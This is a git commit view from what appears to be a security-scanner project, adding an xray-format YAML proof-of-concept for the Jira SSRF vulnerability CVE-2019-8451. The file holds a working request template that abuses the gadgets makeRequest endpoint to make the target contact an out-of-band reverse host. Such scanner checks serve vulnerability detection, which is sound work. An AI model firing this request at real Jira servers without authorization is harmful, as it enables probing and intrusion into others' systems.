优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
+19
View File
@@ -0,0 +1,19 @@
name: poc-yaml-jira-ssrf-cve-2019-8451
set:
originScheme: request.url.scheme
originHost: request.url.host
reverse: newReverse()
reverseHost: reverse.url.host
reverseURL: reverse.url.path
rules:
- method: GET
path: >-
/plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}}
headers:
X-Atlassian-Token: no-check
expression: |
reverse.wait(5)
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://jira.atlassian.com/browse/JRASERVER-69793